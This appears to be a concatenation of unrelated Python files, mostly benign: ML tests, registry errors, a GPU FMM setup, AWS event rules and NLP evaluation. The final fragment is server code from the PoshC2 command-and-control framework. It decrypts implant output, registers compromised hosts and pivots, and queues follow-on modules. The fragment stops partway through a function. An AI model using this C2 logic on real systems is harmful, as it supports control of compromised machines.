adj3 = np.array([[0, 1, 1, 1, 0, 0],
[0, 0, 1, 0, 0, 0],
[0, 0, 0, 0, 1, 0],
[0, 0, 0, 0, 1, 0],
[0, 0, 0, 0, 0, 1],
[0, 0, 0, 0, 0, 0]])
op3 = ['in', 'conv1x1', 'conv3x3', 'mp3x3', 'out','out2']
adj4 = np.array([[0, 1, 1, 1, 0, 0],
[0, 0, 1, 0, 0, 0],
[0, 0, 0, 0, 1, 0],
[0, 0, 0, 0, 1, 0],
[0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0]])
op4 = np.array([[1, 0, 0, 0, 0],
[0, 1, 0, 0, 0],
[0, 0, 1, 0, 0],
[0, 0, 0, 1, 0],
[0, 0, 0, 0, 1],
[0, 0, 0, 0, 0]])
adj4, op4 = preprocess_adj_op(adj4, op4)
G1 = gen_graph(adj1, op1)
G2 = gen_graph(adj2, op2)
G3 = gen_graph(adj3, op3)
G4 = gen_graph(adj4, op4)
plt.subplot(141)
nx.draw(G1, with_labels=True, font_weight='bold')
plt.subplot(142)
nx.draw(G2, with_labels=True, font_weight='bold')
plt.subplot(143)
nx.draw(G3, with_labels=True, font_weight='bold')
plt.subplot(144)
nx.draw(G4, with_labels=True, font_weight='bold')
nx.graph_edit_distance(G1,G2, node_match=node_match, edge_match=edge_match)
nx.graph_edit_distance(G2,G3, node_match=node_match, edge_match=edge_match)
|
16855
|
import bitmath
class V2RegistryException(Exception):
def __init__(
self,
error_code_str,
message,
detail,
http_status_code=400,
repository=None,
scopes=None,
is_read_only=False,
):
super(V2RegistryException, self).__init__(message)
self.http_status_code = http_status_code
self.repository = repository
self.scopes = scopes
self.is_read_only = is_read_only
self._error_code_str = error_code_str
self._detail = detail
def as_dict(self):
error_dict = {
"code": self._error_code_str,
"message": str(self),
"detail": self._detail if self._detail is not None else {},
}
if self.is_read_only:
error_dict["is_readonly"] = True
return error_dict
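# Example of the serialized error produced by as_dict() (illustrative):
#   {"code": "BLOB_UNKNOWN", "message": "blob unknown to registry", "detail": {}}
# with "is_readonly": True added when the registry is in read-only mode.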
class BlobUnknown(V2RegistryException):
def __init__(self, detail=None):
super(BlobUnknown, self).__init__("BLOB_UNKNOWN", "blob unknown to registry", detail, 404)
class BlobUploadInvalid(V2RegistryException):
def __init__(self, detail=None):
super(BlobUploadInvalid, self).__init__(
"BLOB_UPLOAD_INVALID", "blob upload invalid", detail
)
class BlobUploadUnknown(V2RegistryException):
def __init__(self, detail=None):
super(BlobUploadUnknown, self).__init__(
"BLOB_UPLOAD_UNKNOWN", "blob upload unknown to registry", detail, 404
)
class DigestInvalid(V2RegistryException):
def __init__(self, detail=None):
super(DigestInvalid, self).__init__(
"DIGEST_INVALID", "provided digest did not match uploaded content", detail
)
class ManifestBlobUnknown(V2RegistryException):
def __init__(self, detail=None):
super(ManifestBlobUnknown, self).__init__(
"MANIFEST_BLOB_UNKNOWN", "manifest blob unknown to registry", detail
)
class ManifestInvalid(V2RegistryException):
def __init__(self, detail=None, http_status_code=400):
super(ManifestInvalid, self).__init__(
"MANIFEST_INVALID", "manifest invalid", detail, http_status_code
)
class ManifestUnknown(V2RegistryException):
def __init__(self, detail=None):
super(ManifestUnknown, self).__init__("MANIFEST_UNKNOWN", "manifest unknown", detail, 404)
class TagExpired(V2RegistryException):
def __init__(self, message=None, detail=None):
super(TagExpired, self).__init__("TAG_EXPIRED", message or "Tag has expired", detail, 404)
class ManifestUnverified(V2RegistryException):
def __init__(self, detail=None):
super(ManifestUnverified, self).__init__(
"MANIFEST_UNVERIFIED", "manifest failed signature verification", detail
)
class NameInvalid(V2RegistryException):
def __init__(self, detail=None, message=None):
super(NameInvalid, self).__init__(
"NAME_INVALID", message or "invalid repository name", detail
)
class NameUnknown(V2RegistryException):
def __init__(self, detail=None):
super(NameUnknown, self).__init__(
"NAME_UNKNOWN", "repository name not known to registry", detail, 404
)
class SizeInvalid(V2RegistryException):
def __init__(self, detail=None):
super(SizeInvalid, self).__init__(
"SIZE_INVALID", "provided length did not match content length", detail
)
class TagAlreadyExists(V2RegistryException):
def __init__(self, detail=None):
super(TagAlreadyExists, self).__init__(
"TAG_ALREADY_EXISTS", "tag was already pushed", detail, 409
)
class TagInvalid(V2RegistryException):
def __init__(self, detail=None):
super(TagInvalid, self).__init__("TAG_INVALID", "manifest tag did not match URI", detail)
class LayerTooLarge(V2RegistryException):
    def __init__(self, uploaded=None, max_allowed=None):
        detail = {}
        message = "Uploaded blob is larger than allowed by this registry"
        if uploaded is not None and max_allowed is not None:
            detail = {
                "reason": "%s is greater than maximum allowed size %s" % (uploaded, max_allowed),
                "max_allowed": max_allowed,
                "uploaded": uploaded,
            }
            up_str = bitmath.Byte(uploaded).best_prefix().format("{value:.2f} {unit}")
            max_str = bitmath.Byte(max_allowed).best_prefix().format("{value:.2f} {unit}")
            message = "Uploaded blob of %s is larger than %s allowed by this registry" % (
                up_str,
                max_str,
            )
        # The original snippet never initialized the base exception, so the message and
        # detail built above were lost. The BLOB_UPLOAD_INVALID error code is assumed here.
        super(LayerTooLarge, self).__init__("BLOB_UPLOAD_INVALID", message, detail)
class Unauthorized(V2RegistryException):
def __init__(self, detail=None, repository=None, scopes=None):
super(Unauthorized, self).__init__(
"UNAUTHORIZED",
"access to the requested resource is not authorized",
detail,
401,
repository=repository,
scopes=scopes,
)
class Unsupported(V2RegistryException):
def __init__(self, detail=None, message=None):
super(Unsupported, self).__init__(
"UNSUPPORTED", message or "The operation is unsupported.", detail, 405
)
class InvalidLogin(V2RegistryException):
def __init__(self, message=None):
super(InvalidLogin, self).__init__(
"UNAUTHORIZED", message or "Specified credentials are invalid", {}, 401
)
class InvalidRequest(V2RegistryException):
def __init__(self, message=None):
super(InvalidRequest, self).__init__(
"INVALID_REQUEST", message or "Invalid request", {}, 400
)
class NamespaceDisabled(V2RegistryException):
def __init__(self, message=None):
message = message or "This namespace is disabled. Please contact your system administrator."
super(NamespaceDisabled, self).__init__("DENIED", message, {}, 405)
class BlobDownloadGeoBlocked(V2RegistryException):
def __init__(self, detail=None):
message = (
"The region from which you are pulling has been geo-ip blocked. "
+ "Please contact the namespace owner."
)
super(BlobDownloadGeoBlocked, self).__init__("DENIED", message, detail, 403)
class ReadOnlyMode(V2RegistryException):
def __init__(self, detail=None):
message = (
"System is currently read-only. Pulls will succeed but all write operations "
+ "are currently suspended."
)
super(ReadOnlyMode, self).__init__("DENIED", message, detail, 405, is_read_only=True)
|
16860
|
import pytest
import numpy as np
import pandas as pd
from xgboost_distribution.distributions import LogNormal
@pytest.fixture
def lognormal():
return LogNormal()
def test_target_validation(lognormal):
valid_target = np.array([0.5, 1, 4, 5, 10])
lognormal.check_target(valid_target)
@pytest.mark.parametrize(
"invalid_target",
[np.array([0, 1.2]), pd.Series([-1.1, 0.4, 2.3])],
)
def test_target_validation_raises(lognormal, invalid_target):
with pytest.raises(ValueError):
lognormal.check_target(invalid_target)
@pytest.mark.parametrize(
"y, params, natural_gradient, expected_grad",
[
(
np.array([1, 1]),
np.array([[np.log(1), 2], [1, 0]]),
True,
np.array([[0, 0.5], [1, 0]]),
),
(
np.array([1, 1]),
np.array([[np.log(1), 2], [1, 0]]),
False,
np.array([[0, 1], [1, 0]]),
),
],
)
def test_gradient_calculation(lognormal, y, params, natural_gradient, expected_grad):
grad, hess = lognormal.gradient_and_hessian(
y, params, natural_gradient=natural_gradient
)
np.testing.assert_array_equal(grad, expected_grad)
def test_loss(lognormal):
loss_name, loss_value = lognormal.loss(
# fmt: off
y=np.array([0, ]),
params=np.array([[1, 0], ]),
)
assert loss_name == "LogNormalError"
assert loss_value == np.inf
|
16907
|
import numpy as np
import tectosaur.util.gpu as gpu
from tectosaur.fmm.c2e import build_c2e
import logging
logger = logging.getLogger(__name__)
def make_tree(m, cfg, max_pts_per_cell):
tri_pts = m[0][m[1]]
centers = np.mean(tri_pts, axis = 1)
pt_dist = tri_pts - centers[:,np.newaxis,:]
Rs = np.max(np.linalg.norm(pt_dist, axis = 2), axis = 1)
tree = cfg.traversal_module.Tree.build(centers, Rs, max_pts_per_cell)
return tree
class FMM:
def __init__(self, obs_tree, obs_m, src_tree, src_m, cfg):
self.cfg = cfg
self.obs_tree = obs_tree
self.obs_m = obs_m
self.src_tree = src_tree
self.src_m = src_m
self.gpu_data = dict()
self.setup_interactions()
self.collect_gpu_ops()
self.setup_output_sizes()
self.params_to_gpu()
self.tree_to_gpu(obs_m, src_m)
self.interactions_to_gpu()
self.d2e_u2e_ops_to_gpu()
def setup_interactions(self):
self.interactions = self.cfg.traversal_module.fmmmm_interactions(
self.obs_tree, self.src_tree, self.cfg.inner_r, self.cfg.outer_r,
self.cfg.order, self.cfg.treecode
)
def collect_gpu_ops(self):
self.gpu_ops = dict()
for a in ['s', 'p']:
for b in ['s', 'p']:
name = a + '2' + b
self.gpu_ops[name] = getattr(self.cfg.gpu_module, name + '_' + self.cfg.K.name)
self.gpu_ops['c2e1'] = self.cfg.gpu_module.c2e_kernel1
self.gpu_ops['c2e2'] = self.cfg.gpu_module.c2e_kernel2
def setup_output_sizes(self):
self.n_surf_tris = self.cfg.surf[1].shape[0]
self.n_surf_dofs = self.n_surf_tris * 9
self.n_multipoles = self.n_surf_dofs * self.src_tree.n_nodes
self.n_locals = self.n_surf_dofs * self.obs_tree.n_nodes
self.n_input = self.src_m[1].shape[0] * 9
self.n_output = self.obs_m[1].shape[0] * 9
def float_gpu(self, arr):
return gpu.to_gpu(arr, self.cfg.float_type)
def int_gpu(self, arr):
return gpu.to_gpu(arr, np.int32)
def params_to_gpu(self):
self.gpu_data['params'] = self.float_gpu(self.cfg.params)
def tree_to_gpu(self, obs_m, src_m):
gd = self.gpu_data
gd['obs_pts'] = self.float_gpu(obs_m[0])
gd['obs_tris'] = self.int_gpu(obs_m[1][self.obs_tree.orig_idxs])
gd['src_pts'] = self.float_gpu(src_m[0])
gd['src_tris'] = self.int_gpu(src_m[1][self.src_tree.orig_idxs])
obs_tree_nodes = self.obs_tree.nodes
src_tree_nodes = self.src_tree.nodes
for name, tree in [('src', self.src_tree), ('obs', self.obs_tree)]:
gd[name + '_n_C'] = self.float_gpu(tree.node_centers)
gd[name + '_n_R'] = self.float_gpu(tree.node_Rs)
for name, tree in [('src', src_tree_nodes), ('obs', obs_tree_nodes)]:
gd[name + '_n_start'] = self.int_gpu(np.array([n.start for n in tree]))
gd[name + '_n_end'] = self.int_gpu(np.array([n.end for n in tree]))
def interactions_to_gpu(self):
op_names = ['p2p', 'p2m', 'p2l', 'm2p', 'm2m', 'm2l', 'l2p', 'l2l']
for name in op_names:
op = getattr(self.interactions, name)
if type(op) is list:
for i, op_level in enumerate(op):
self.op_to_gpu(name + str(i), op_level)
else:
self.op_to_gpu(name, op)
def op_to_gpu(self, name, op):
for data_name in ['obs_n_idxs', 'obs_src_starts', 'src_n_idxs']:
self.gpu_data[name + '_' + data_name] = self.int_gpu(
np.array(getattr(op, data_name), copy = False)
)
def d2e_u2e_ops_to_gpu(self):
gd = self.gpu_data
gd['u2e_obs_n_idxs'] = [
self.int_gpu(np.array(self.interactions.u2e[level].obs_n_idxs, copy = False))
for level in range(len(self.interactions.m2m))
]
gd['d2e_obs_n_idxs'] = [
self.int_gpu(np.array(self.interactions.d2e[level].obs_n_idxs, copy = False))
for level in range(len(self.interactions.l2l))
]
u2e_UT, u2e_E, u2e_V = build_c2e(
self.src_tree, self.cfg.outer_r, self.cfg.inner_r, self.cfg
)
gd['u2e_V'] = self.float_gpu(u2e_V)
gd['u2e_E'] = self.float_gpu(u2e_E)
gd['u2e_UT'] = self.float_gpu(u2e_UT)
d2e_UT, d2e_E, d2e_V = build_c2e(
self.obs_tree, self.cfg.inner_r, self.cfg.outer_r, self.cfg
)
gd['d2e_V'] = self.float_gpu(d2e_V)
gd['d2e_E'] = self.float_gpu(d2e_E)
gd['d2e_UT'] = self.float_gpu(d2e_UT)
def to_tree(self, input_orig):
orig_idxs = np.array(self.src_tree.orig_idxs)
input_orig = input_orig.reshape((-1,9))
return input_orig[orig_idxs,:].flatten()
def to_orig(self, output_tree):
orig_idxs = np.array(self.obs_tree.orig_idxs)
output_tree = output_tree.reshape((-1, 9))
output_orig = np.empty_like(output_tree)
output_orig[orig_idxs,:] = output_tree
return output_orig.flatten()
def report_interactions(fmm_obj):
dim = fmm_obj.obs_m[1].shape[1]
order = fmm_obj.cfg.surf[1].shape[0]
def count_interactions(op_name, op):
        obs_surf = op_name[2] != 'p'
        src_surf = op_name[0] != 'p'
return fmm_obj.cfg.traversal_module.count_interactions(
op, fmm_obj.obs_tree, fmm_obj.src_tree,
obs_surf, src_surf, order
)
n_obs_tris = fmm_obj.obs_m[1].shape[0]
n_src_tris = fmm_obj.src_m[1].shape[0]
level_ops = ['m2m', 'l2l']
ops = ['p2m', 'p2l', 'm2l', 'p2p', 'm2p', 'l2p']
interactions = dict()
for op_name in ops:
op = getattr(fmm_obj.interactions, op_name)
interactions[op_name] = count_interactions(op_name, op)
for op_name in level_ops:
ops = getattr(fmm_obj.interactions, op_name)
for op in ops:
if op_name not in interactions:
interactions[op_name] = 0
interactions[op_name] += count_interactions(op_name, op)
direct_i = n_obs_tris * n_src_tris
fmm_i = sum([v for k,v in interactions.items()])
logger.info('compression factor: ' + str(fmm_i / direct_i))
logger.info('# obs tris: ' + str(n_obs_tris))
logger.info('# src tris: ' + str(n_src_tris))
logger.info('total tree interactions: %e' % fmm_i)
for k, v in interactions.items():
logger.info('total %s interactions: %e' % (k, v))
|
16922
|
import boto3
from django.conf import settings
from backend.models import CloudWatchEvent
import json
class Events:
def __init__(self):
self.client = boto3.client('events', region_name=settings.NARUKO_REGION)
def list_rules(self):
response = []
for rules in self._list_rules():
response.extend(rules)
return response
def _list_rules(self):
        # First request: no pagination token yet
response = self.client.list_rules(NamePrefix='NARUKO-')
token = response.get("NextToken")
yield self._build_cloudwatchevent(response["Rules"])
        # While a NextToken is returned, keep yielding the following pages
while token:
response = self.client.list_rules(
NamePrefix='NARUKO-',
NextToken=token
)
token = response.get("NextToken")
yield self._build_cloudwatchevent(response["Rules"])
@staticmethod
def _build_cloudwatchevent(rules: dict):
cloudwatchevents = []
for rule in rules:
cloudwatchevents.append(CloudWatchEvent(
name=rule["Name"],
schedule_expression=rule.get("ScheduleExpression"),
is_active=rule["State"] == "ENABLED"
))
return cloudwatchevents
def save_event(self, event):
        # Create the rule
self.client.put_rule(
Name=event.cloudwatchevent.name,
ScheduleExpression=event.cloudwatchevent.schedule_expression,
State="ENABLED" if event.cloudwatchevent.is_active else "DISABLED"
)
        # Create the target
target = dict(
Id=event.cloudwatchevent.name,
Arn=settings.EVENT_SNS_TOPIC_ARN,
Input=json.dumps(dict(id=event.event_model.id))
)
self.client.put_targets(
Rule=event.cloudwatchevent.name,
Targets=[target]
)
return event
def delete_event(self, event_name):
        # Remove the targets
self.client.remove_targets(
Rule=event_name,
Ids=[event_name]
)
        # Delete the rule
self.client.delete_rule(
Name=event_name
)
def describe_event(self, event_name):
response = self.client.describe_rule(
Name=event_name
)
return CloudWatchEvent(
name=response["Name"],
schedule_expression=response["ScheduleExpression"],
is_active=response["State"] == "ENABLED"
)
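# Usage sketch (assumes NARUKO_REGION and EVENT_SNS_TOPIC_ARN are configured in Django settings):
#   events = Events()
#   for rule in events.list_rules():
#       print(rule.name, rule.schedule_expression, rule.is_active)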
|
16937
|
import os
import subprocess
import threading
mutex = threading.Lock()
def render_appleseed(target_file, base_color_tex, normal_tex, roughness_tex, metallic_tex, resolution, appleseed_path):
mutex.acquire()
try:
# Read the template file from disk.
with open("scene_template.appleseed", "r") as file:
project_text = file.read()
# Substitute variables by their values.
project_text = project_text.replace("$baseColorTexturePath", base_color_tex)
project_text = project_text.replace("$normalTexturePath", normal_tex)
project_text = project_text.replace("$roughnessTexturePath", roughness_tex)
project_text = project_text.replace("$metallicTexturePath", metallic_tex)
project_text = project_text.replace("$frameWidth", str(resolution[0]))
project_text = project_text.replace("$frameHeight", str(resolution[1]))
# Write the new project file to disk.
project_file = os.path.splitext(target_file)[0] + ".appleseed"
with open(project_file, "w") as file:
file.write(project_text)
# Invoke appleseed to render the project file.
appleseed_cli_path = os.path.join(appleseed_path, "bin", "appleseed.cli.exe" if os.name == "nt" else "appleseed.cli")
subprocess.check_call([appleseed_cli_path, "--message-verbosity", "error", project_file, "--output", target_file])
except Exception as e:
print("Failed to generate {0} with appleseed: {1}".format(target_file, e))
raise
finally:
mutex.release()
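# Usage sketch (all paths below are hypothetical):
#   render_appleseed(
#       "out/material_preview.png",
#       "textures/base_color.png", "textures/normal.png",
#       "textures/roughness.png", "textures/metallic.png",
#       resolution=(512, 512),
#       appleseed_path="/opt/appleseed",
#   )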
|
16941
|
from .problem import ContingentProblem as Problem
from ..action import Action
from .sensor import Sensor
from . import errors
|
16947
|
class Solution(object):
def reverseVowels(self, s):
"""
:type s: str
:rtype: str
"""
vowels = set("aeiouAEIOU")
s = list(s)
i = 0
j = len(s) - 1
while i < j:
while i < j and s[i] not in vowels:
i += 1
while i < j and s[j] not in vowels:
j -= 1
if i < j:
s[i], s[j] = s[j], s[i]
i += 1
j -= 1
return ''.join(s)
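# Example: Solution().reverseVowels("hello") returns "holle"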
|
16988
|
import os
import argparse
import subprocess
import random
import edlib
from typing import List
from collections import Counter
import stanza
class ExtractMetric(object):
"""used for precision recall"""
def __init__(self, nume=0, denom_p=0, denom_r=0, precision=0, recall=0, f1=0):
super(ExtractMetric, self).__init__()
self.nume = nume
self.denom_p = denom_p
self.denom_r = denom_r
self.precision = precision
self.recall = recall
self.f1 = f1
def read_file(fname, len_cut):
res1, res2 = [], []
with open(fname) as fin:
for line in fin:
x, y = line.rstrip().split('\t')
if len(x.split()) > len_cut or len(y.split()) > len_cut:
continue
res1.append(x)
res2.append(y)
return res1, res2
def write_file(fname: str, data: List[str]):
with open(fname, 'w') as fout:
for sent in data:
if isinstance(sent, list):
fout.write('{}\n'.format(' '.join(sent)))
else:
fout.write('{}\n'.format(sent))
def eval_edit(prototype, example):
def flat_cigar(cigar):
"""flatten the result path returned by edlib.align
"""
r = []
pointer = 0
while pointer < len(cigar):
num = []
while cigar[pointer].isdigit():
num.append(cigar[pointer])
pointer += 1
num = int(''.join(num))
r.extend([cigar[pointer]] * num)
pointer += 1
return r
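    # e.g. flat_cigar('3=1X2I') -> ['=', '=', '=', 'X', 'I', 'I']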
res = {}
for p_sent, e_sent in zip(prototype, example):
p_pos = [x.upos for x in p_sent.words]
e_pos = [x.upos for x in e_sent.words]
p_text = [x.text for x in p_sent.words]
e_text = [x.text for x in e_sent.words]
edit_operation = edlib.align(e_text, p_text, task='path')
edit_operation = flat_cigar(edit_operation['cigar'])
new_p_text = []
new_e_text = []
new_p_pos = []
new_e_pos = []
src_cur = tgt_cur = 0
for edit in edit_operation:
if edit == '=' or edit == 'X':
new_p_text.append(p_text[src_cur])
new_p_pos.append(p_pos[src_cur])
new_e_text.append(e_text[tgt_cur])
new_e_pos.append(e_pos[tgt_cur])
src_cur += 1
tgt_cur += 1
elif edit == 'I':
new_p_text.append(-1)
new_p_pos.append(-1)
new_e_text.append(e_text[tgt_cur])
new_e_pos.append(e_pos[tgt_cur])
tgt_cur += 1
elif edit == 'D':
new_p_text.append(p_text[src_cur])
new_p_pos.append(p_pos[src_cur])
new_e_text.append(-1)
new_e_pos.append(-1)
src_cur += 1
else:
raise ValueError('{} edit operation is invalid!'.format(edit))
for i, edit in enumerate(edit_operation):
if edit not in res:
res[edit] = Counter()
if edit == '=':
res[edit]['{}={}'.format(new_p_pos[i], new_e_pos[i])] += 1
elif edit == 'X':
res[edit]['{}->{}'.format(new_p_pos[i], new_e_pos[i])] += 1
elif edit == 'I':
res[edit]['+{}'.format(new_e_pos[i])] += 1
elif edit == 'D':
res[edit]['-{}'.format(new_p_pos[i])] += 1
else:
raise ValueError
return res
def eval_f1(prototype, example):
res = {}
for p_sent, e_sent in zip(prototype, example):
p_pos = [x.upos for x in p_sent.words]
e_pos = [x.upos for x in e_sent.words]
p_text = [x.text for x in p_sent.words]
e_text = [x.text for x in e_sent.words]
e_word_counter = Counter(e_text)
for word, pos in zip(p_text, p_pos):
if pos not in res:
res[pos] = ExtractMetric(
nume=0,
denom_p=0,
denom_r=0,
precision=0,
recall=0,
f1=0
)
res[pos].denom_r += 1
if e_word_counter[word] > 0:
e_word_counter[word] -= 1
res[pos].nume += 1
e_pos_counter = Counter(e_pos)
for k, v in e_pos_counter.items():
if k not in res:
res[k] = ExtractMetric(
nume=0,
denom_p=0,
denom_r=0,
precision=0,
recall=0,
f1=0
)
res[k].denom_p += v
for k, v in res.items():
if res[k].denom_p != 0 and res[k].denom_r != 0 and res[k].nume != 0:
res[k].precision = res[k].nume / res[k].denom_p
res[k].recall = res[k].nume / res[k].denom_r
res[k].f1 = 2 * res[k].precision * res[k].recall / (res[k].precision + res[k].recall)
return res
def sentence_bleu(ref_path, hypo_path):
sent_bleu = subprocess.getoutput(
"fairseq-score --ref {} --sys {} --sentence-bleu".format(ref_path, hypo_path))
bleu_list = [float(line.split()[3].rstrip(',')) for line in sent_bleu.split('\n')[1:]]
return sum(bleu_list) / len(bleu_list)
def generate_rand_prototype(exp_dir, num):
dataset_to_template = {
"coco40k": "support_prototype/datasets/coco/coco.template.40k.txt",
"yelp": "support_prototype/datasets/yelp_data/yelp.template.50k.lower.txt",
"yelp_large": "support_prototype/datasets/yelp_large_data/yelp_large.template.100k.txt",
}
def parse_exp_dir(name):
dataset = name.rstrip('/').split('/')[-1].split('_')[0]
return dataset
dataset = parse_exp_dir(exp_dir)
return subprocess.getoutput(
"shuf -n {} {}".format(num, dataset_to_template[dataset])).split('\n')
parser = argparse.ArgumentParser(description='Evaluate analysis metrics')
parser.add_argument('--prefix', type=str, choices=['inference', 'generation'],
help='prediction file prefix')
parser.add_argument('--exp-dir', type=str, help='output directory')
args = parser.parse_args()
fout = open(os.path.join(args.exp_dir, 'analysis_{}_res.txt'.format(args.prefix)), 'w')
len_cut = 1000
prototypes, examples = read_file(os.path.join(args.exp_dir, '{}_analysis_input.txt'.format(args.prefix)), len_cut=len_cut)
prototype_path = os.path.join(args.exp_dir, 'prototype.txt')
prototype_pos_path = os.path.join(args.exp_dir, 'prototype_pos.txt')
prototype_rand_path = os.path.join(args.exp_dir, 'prototype_rand.txt')
prototype_pos_rand_path = os.path.join(args.exp_dir, 'prototype_pos_rand.txt')
example_path = os.path.join(args.exp_dir, 'example.txt')
example_pos_path = os.path.join(args.exp_dir, 'example_pos.txt')
prototypes_rand = generate_rand_prototype(args.exp_dir, len(examples))
write_file(prototype_path, prototypes)
write_file(example_path, examples)
write_file(prototype_rand_path, prototypes_rand)
# surface BLEU
# bleu = subprocess.getoutput(
# "./support_prototype/scripts/multi-bleu.perl {} < {}".format(prototype_path, example_rand_path))
bleu = sentence_bleu(prototype_rand_path, example_path)
print('Regular BLEU (random baseline): \n{}'.format(bleu))
fout.write('Regular BLEU (random baseline): \n{}'.format(bleu))
fout.write('\n\n\n')
# bleu = subprocess.getoutput(
# "./support_prototype/scripts/multi-bleu.perl {} < {}".format(prototype_path, example_path))
bleu = sentence_bleu(prototype_path, example_path)
print('Regular BLEU: \n{}'.format(bleu))
fout.write('Regular BLEU: \n{}'.format(bleu))
fout.write('\n\n\n')
# POS tagging
print('POS tagging')
nlp = stanza.Pipeline(lang='en', processors='tokenize,mwt,pos', tokenize_pretokenized=True)
prototype_doc = nlp('\n'.join(prototypes))
example_doc = nlp('\n'.join(examples))
prototype_rand_doc = nlp('\n'.join(prototypes_rand))
prototypes_pos = [[word.upos for word in sent.words] for sent in prototype_doc.sentences]
examples_pos = [[word.upos for word in sent.words] for sent in example_doc.sentences]
prototypes_pos_rand = [[word.upos for word in sent.words] for sent in prototype_rand_doc.sentences]
write_file(prototype_pos_path, prototypes_pos)
write_file(example_pos_path, examples_pos)
write_file(prototype_pos_rand_path, prototypes_pos_rand)
# POS BLEU
# bleu = subprocess.getoutput(
# "./support_prototype/scripts/multi-bleu.perl {} < {}".format(prototype_pos_path, example_pos_rand_path))
bleu = sentence_bleu(prototype_pos_rand_path, example_pos_path)
print('POS BLEU (random baseline): \n{}'.format(bleu))
fout.write('POS BLEU (random baseline): \n{}'.format(bleu))
fout.write('\n\n\n')
# bleu = subprocess.getoutput(
# "./support_prototype/scripts/multi-bleu.perl {} < {}".format(prototype_pos_path, example_pos_path))
bleu = sentence_bleu(prototype_pos_path, example_pos_path)
print('POS BLEU: \n{}'.format(bleu))
fout.write('POS BLEU: \n{}'.format(bleu))
fout.write('\n\n\n')
# break down precision and recall
print("compute precision, recall, f1")
assert len(prototypes) == len(prototypes_pos)
assert len(examples) == len(examples_pos)
res = eval_f1(list(prototype_rand_doc.sentences), list(example_doc.sentences))
res = sorted(res.items(), key=lambda item: -item[1].f1)
fout.write('random baseline precision-recall\n')
fout.write('POS recall precision f1\n')
for k, v in res:
fout.write('{} {} {} {}\n'.format(k, v.recall, v.precision, v.f1))
fout.write('\n\n\n')
res = eval_f1(list(prototype_doc.sentences), list(example_doc.sentences))
res = sorted(res.items(), key=lambda item: -item[1].f1)
fout.write('precision-recall\n')
fout.write('POS recall precision f1\n')
for k, v in res:
fout.write('{} {} {} {}\n'.format(k, v.recall, v.precision, v.f1))
fout.write('\n\n\n')
# edit operations
print("edit analysis")
res = eval_edit(list(prototype_doc.sentences), list(example_doc.sentences))
total = sum([sum(v.values()) for k, v in res.items()])
fout.write('total: {}\n'.format(total))
res = sorted(res.items(), key=lambda item: (-sum(item[1].values())))
for k, v in res:
fout.write('{}: {}\n'.format(k, sum(v.values())))
for k1, v1 in v.most_common():
fout.write('{}: {} ({:.3f}), '.format(k1, v1, v1 / sum(v.values())))
fout.write('\n\n')
fout.close()
|
17027
|
import datetime, hashlib, base64, traceback, os, re
import poshc2.server.database.DB as DB
from poshc2.Colours import Colours
from poshc2.server.Config import ModulesDirectory, DownloadsDirectory, ReportsDirectory
from poshc2.server.Implant import Implant
from poshc2.server.Core import decrypt, encrypt, default_response, decrypt_bytes_gzip, number_of_days, process_mimikatz, print_bad
from poshc2.server.Core import load_module, load_module_sharp, encrypt, default_response
from poshc2.server.payloads.Payloads import Payloads
from poshc2.server.PowerStatus import translate_power_status
from poshc2.Utils import randomuri
def newTaskOutput(uriPath, cookieVal, post_data, wsclient=False):
now = datetime.datetime.now()
all_implants = DB.get_implants_all()
if not all_implants:
print_bad("Received post request but no implants in database... has the project been cleaned but you're using the same URLs?")
return
for implant in all_implants:
implantID = implant.ImplantID
RandomURI = implant.RandomURI
Hostname = implant.Hostname
encKey = implant.Key
Domain = implant.Domain
User = implant.User
implant_type = implant.Pivot
if RandomURI in uriPath and cookieVal:
DB.update_implant_lastseen(now.strftime("%Y-%m-%d %H:%M:%S"), RandomURI)
decCookie = decrypt(encKey, cookieVal)
if implant_type == "JXA":
rawoutput = decrypt(encKey, post_data[1500:])
else:
rawoutput = decrypt_bytes_gzip(encKey, post_data[1500:])
if decCookie.startswith("Error"):
print(Colours.RED)
print("The multicmd errored: ")
print(rawoutput)
print(Colours.GREEN)
return
cookieMsg = ""
if "-" in decCookie:
decCookie = decCookie.strip('\x00')
splt = decCookie.split("-")
if not splt[0].isdigit():
print(Colours.RED + "[!] Cookie %s is invalid" % decCookie + Colours.GREEN)
return
else:
taskId = str(int(splt[0]))
cookieMsg = splt[1]
else:
taskId = str(int(decCookie.strip('\x00')))
taskIdStr = "0" * (5 - len(str(taskId))) + str(taskId)
if taskId != "99999":
executedCmd = DB.get_cmd_from_task_id(taskId)
task_owner = DB.get_task_owner(taskId)
else:
print(Colours.END)
timenow = now.strftime("%Y-%m-%d %H:%M:%S")
print(f"Background task against implant {implantID} on host {Domain}\\{User} @ {Hostname} ({timenow}) (output appended to %sbackground-data.txt)" % ReportsDirectory)
print(Colours.GREEN)
print(rawoutput)
miscData = open(("%sbackground-data.txt" % ReportsDirectory), "a+")
miscData.write(rawoutput)
return
print(Colours.GREEN)
if task_owner is not None:
print("Task %s (%s) returned against implant %s on host %s\\%s @ %s (%s)" % (taskIdStr, task_owner, implantID, Domain, User, Hostname, now.strftime("%Y-%m-%d %H:%M:%S")))
else:
print("Task %s returned against implant %s on host %s\\%s @ %s (%s)" % (taskIdStr, implantID, Domain, User, Hostname, now.strftime("%Y-%m-%d %H:%M:%S")))
try:
outputParsed = re.sub(r'123456(.+?)654321', '', rawoutput)
outputParsed = outputParsed.rstrip()
except Exception:
pass
if cookieMsg is not None and cookieMsg.lower().startswith("pwrstatusmsg"):
translate_power_status(outputParsed, RandomURI)
return
if "loadmodule" in executedCmd and len(outputParsed.split()) == 0:
print("Module loaded successfully")
DB.update_task(taskId, "Module loaded successfully")
elif "pbind-connect " in executedCmd and "PBind-Connected" in outputParsed or "PBind PBind start" in executedCmd and "PBind-Connected" in outputParsed:
outputParsed = re.search("PBind-Connected:.*", outputParsed)
outputParsed = outputParsed[0].replace("PBind-Connected: ", "")
Domain, User, Hostname, Arch, PID, Proxy = str(outputParsed).split(";")
Proxy = Proxy.replace("\x00", "")
if "\\" in User:
User = User[User.index("\\") + 1:]
PivotString = "C# PBind"
if "pbind-command run-exe PBind PBind start" in executedCmd:
PivotString = "C# PBind Pivot"
newImplant = Implant(implantID, PivotString, str(Domain), str(User), str(Hostname), Arch, PID, None)
newImplant.save()
newImplant.display()
newImplant.autoruns()
if "pbind-command run-exe PBind PBind start" in executedCmd:
DB.new_task("pbind-pivot-loadmodule Stage2-Core.exe", "autoruns", RandomURI)
else:
DB.new_task("pbind-loadmodule Stage2-Core.exe", "autoruns", RandomURI)
elif "fcomm-connect " in executedCmd and "FComm-Connected" in outputParsed:
outputParsed = re.search("FComm-Connected:.*", outputParsed)
